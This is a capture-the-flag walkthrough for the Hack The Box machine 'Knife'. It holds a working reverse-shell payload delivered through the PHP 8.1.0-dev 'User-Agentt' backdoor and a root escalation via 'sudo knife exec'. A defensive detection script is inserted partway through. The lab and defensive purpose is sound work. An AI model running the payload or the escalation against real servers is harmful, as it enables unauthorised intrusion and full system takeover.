HTB Walkthrough: Knife
Overview
Knife is a relatively easy Linux box on Hack The Box. It features a vulnerable development build of PHP (PHP/8.1.0-dev) that exposes a backdoor. By exploiting this, we gain a reverse shell as user james. Privilege escalation is achieved via sudo access to /usr/bin/knife, a tool that allows arbitrary command execution as root.
Phase 1: Initial Reconnaissance
1. Nmap Scan
sudo nmap -A 10.129.37.146
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Analysis:
- Port 22: OpenSSH 8.2p1 — noted, but not the focus.
- Port 80: Apache hosting a site called Emergent Medical Idea — main attack surface.
2. Web Directory Bruteforce
gobuster dir -u http://10.129.37.146 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
/server-status (Status: 403)
Analysis:
Nothing useful found. /server-status is forbidden (403).
3. Try SSH Login
sudo ssh 10.129.37.146
root@10.129.37.146's password:
Permission denied
Analysis: As expected, password-based root login is blocked.
4. Identify PHP Version from Headers
Using browser dev tools or:
curl -I http://10.129.37.146/
X-Powered-By: PHP/8.1.0-dev
Analysis: This version is known to contain a backdoor in development builds. Critical lead.
5. Search for Exploits
searchsploit php 8.1.0
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution | php/webapps/49933.py
Analysis: Perfect match. We'll use this script to get RCE.
Phase 2: Gaining Initial Shell (User: james)
1. Copy the Exploit Script
searchsploit -m 49933.py
ls
49933.py knife.txt
2. Prepare Your Firewall (UFW)
sudo ufw status numbered
sudo ufw delete 3
sudo ufw delete 2
sudo ufw allow 9001/tcp
sudo ufw status verbose
9001/tcp ALLOW IN Anywhere
3. Set Up Netcat Listener
nc -lvnp 9001
listening on [any] 9001 ...
4. Send Malicious curl Request
curl -v -H "User-Agentt: zerodiumsystem('bash -c \"bash -i >& /dev/tcp/10.10.14.90/9001 0>&1\"');" http://10.129.37.146/
Analysis: Request sent — check your listener.
5. Catch the Shell
nc -lvnp 9001
connect to [10.10.14.90] from (UNKNOWN) [10.129.37.146]
bash: no job control in this shell
james@knife:/$ whoami
james
Success! We are james.
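The two indicators this walkthrough relies on, the X-Powered-By: PHP/8.1.0-dev response header (Phase 1, step 4) and the misspelled User-Agentt request header carrying the zerodium trigger (step 4 above), are also what a defender would look for in web traffic. The following Python script is an added example, not part of the original walkthrough: it parses constructed HTTP messages offline and flags both indicators; the host names and sample header values are made up.

```python
"""Flag the two PHP 8.1.0-dev 'User-Agentt' backdoor indicators in raw HTTP messages.
Added example for this walkthrough, not part of the original post: the backdoored
build evaluated the misspelled User-Agentt header when it contained 'zerodium'."""
from typing import Dict, List, Tuple

BACKDOOR_VERSION = "PHP/8.1.0-dev"
TRIGGER = "zerodium"

# Constructed samples: a benign request, one carrying the trigger, and a response.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: site.test\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: site.test\r\nUser-Agentt: zerodiumsystem('id');\r\n\r\n",
]
SAMPLE_RESPONSE = "HTTP/1.1 200 OK\r\nX-Powered-By: PHP/8.1.0-dev\r\nContent-Type: text/html\r\n\r\n"


def parse_headers(raw: str) -> Tuple[str, Dict[str, str]]:
    """Return the start line and a dict of headers keyed by lowercase name."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]  # accept CRLF or bare LF
    lines = head.split("\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()  # header names are case-insensitive
    return lines[0], headers


def check_request(raw: str) -> List[str]:
    """Indicators in an inbound request; legitimate clients never send 'User-Agentt'."""
    _, headers = parse_headers(raw)
    findings: List[str] = []
    value = headers.get("user-agentt")
    if value is not None:
        findings.append("misspelled User-Agentt header")
        # The backdoor matched the substring case-sensitively; matching
        # case-insensitively here casts a deliberately wider net.
        if TRIGGER in value.lower():
            findings.append("zerodium trigger string")
    return findings


def check_response(raw: str) -> List[str]:
    """Indicator in a server response: the backdoored build's version banner."""
    _, headers = parse_headers(raw)
    if headers.get("x-powered-by") == BACKDOOR_VERSION:
        return ["server advertises " + BACKDOOR_VERSION]
    return []
```

Run against a proxy or IDS capture, the request check is the higher-signal alert, since no browser or legitimate client emits a User-Agentt header; the response check tells you which hosts need the build replaced.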
Phase 3: Stabilizing the Shell
1. Spawn a PTY
python3 -c 'import pty; pty.spawn("bash")'
2. Background Shell
Press Ctrl+Z then:
stty raw -echo; fg
3. Confirm Stable Shell
james@knife:/$ whoami
james
4. Retrieve User Flag
cd /home/james
cat user.txt
User flag acquired.
Phase 4: Privilege Escalation to Root
1. Check sudo Permissions
sudo -l
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
Analysis:
Perfect. We can run knife as root without a password.
2. Exploit Knife
sudo knife exec -E "exec '/bin/bash'"
root@knife:/usr/bin# whoami
root
3. Retrieve Root Flag
cd /root
cat root.txt